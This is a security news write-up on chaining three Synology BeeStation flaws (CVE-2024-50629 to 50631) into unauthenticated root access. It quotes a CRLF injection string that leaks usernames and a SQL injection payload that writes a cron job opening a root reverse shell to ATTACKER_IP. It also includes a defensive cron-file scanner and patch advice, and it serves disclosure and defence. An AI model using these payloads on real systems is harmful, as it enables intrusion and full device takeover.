Thursday, March 5, 2026

Chaining Synology BeeStation Flaws To Gain Root Access via Exploited Task Scheduler

Security researchers chained three vulnerabilities in Synology BeeStation devices to enable unauthenticated attackers to remotely gain root access.

DEVCORE first demonstrated the chain at Pwn2Own 2024, and independent analyst kiddo-pwn has published an N-day exploit highlighting a creative SQLite injection method targeting the cron task scheduler.

Vulnerability Chain

The flaws affect BeeStation OS versions before 1.1-65374, DSM versions before 7.2.2-72806-1, and Synology Drive Server versions before 3.5.1-26102.

| CVE | Component | Severity (CVSS 3.1) | Details |
| --- | --- | --- | --- |
| CVE-2024-50629 | webapi (DSM/BSM) | Moderate (5.3) | CRLF injection in redirect_url parameter enables limited file read via X-Accel-Redirect. |
| CVE-2024-50630 | Synology Drive Server webapi | Important (7.5) | Improper authentication in syncd daemon bypasses password check using username only. |
| CVE-2024-50631 | Synology Drive Server syncd | Important (7.5) | SQL injection in update_settings command on sharing_link parameters allows write operations. |

Attackers first exploit CVE-2024-50629 in the SYNO.API.Auth.RedirectURI endpoint.

By appending \r\nX-Accel-Redirect:/volume1/@synologydrive/log/cloud-worker.log\r\n to redirect_url, they leak usernames from initialization logs.

Root RCE Technique

CVE-2024-50630 requires a valid username. Omitting the password in syncd requests via webapi forces fallback to domain socket authentication, which trusts local origin and skips password validation.


Post-auth, CVE-2024-50631 targets SQLite queries in the binary protocol on TCP port 6690.

Unescaped inputs like sharing_link_customization enable breakout: "; ATTACH DATABASE '/etc/cron.d/pwn.task' AS cron; CREATE TABLE cron.tab (dataz text); INSERT INTO cron.tab (dataz) VALUES ('\n* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\n'); --.

This “dirty file write” creates a SQLite database disguised as crontab.

Cron treats the binary headers as malformed lines and ignores them, while the newlines around the injected text isolate it as a valid entry, allowing a root reverse shell to be executed within a minute.
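A defender-side check for the artifact described above, added here as an example and not taken from the original research or from Synology: it flags files in a cron directory that begin with the SQLite header or contain NUL bytes, and lists any lines cron could still parse. The function names and the sample bytes are constructed for illustration.

```python
import re
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"  # first 16 bytes of every SQLite 3 database file
# System crontab line: five schedule fields, a user name, then the command.
CRON_LINE = re.compile(rb"^\s*(?:[\d*/,\-]+\s+){5}[A-Za-z_][\w\-]*\s+\S.*$")


def inspect_cron_file(data: bytes) -> dict:
    """Classify one file's bytes; flag SQLite headers and binary content."""
    entries = [
        line.strip().decode("ascii")
        for line in data.split(b"\n")
        if CRON_LINE.match(line) and all(32 <= b < 127 or b == 9 for b in line)
    ]
    is_sqlite = data.startswith(SQLITE_MAGIC)
    has_binary = b"\x00" in data  # a legitimate crontab is plain text
    return {
        "is_sqlite": is_sqlite,
        "has_binary": has_binary,
        "suspicious": is_sqlite or has_binary,
        "runnable_entries": entries,  # lines cron would still accept
    }


def scan_cron_dir(directory: str) -> dict:
    """Return {file name: result} for every suspicious regular file in directory."""
    findings = {}
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            result = inspect_cron_file(path.read_bytes())
            if result["suspicious"]:
                findings[path.name] = result
    return findings


# Constructed sample: SQLite magic, filler bytes, and one harmless embedded entry.
SAMPLE_DIRTY = (SQLITE_MAGIC + b"\x10\x00\x01\x01" + b"\x00" * 64
                + b"\x0d\x00\x17\n* * * * * root /bin/true\n" + b"\x00" * 16)
# Constructed sample of a normal text crontab file.
SAMPLE_CLEAN = b"# constructed normal file\n0 3 * * * root /usr/bin/logrotate /etc/logrotate.conf\n"

if __name__ == "__main__":
    for name, result in scan_cron_dir("/etc/cron.d").items():
        print(name, result)
```

Any hit on a production system warrants investigation, since a SQLite header or NUL byte has no legitimate place in a crontab file.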

Synology patched these in advisories SA-24:20 and SA-24:21. Update immediately and monitor logs. A full PoC exists on GitHub.

Credits go to DEVCORE’s Pumpkin Chang and Orange Tsai for discovery, with kiddo-pwn advancing the cron technique.

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.
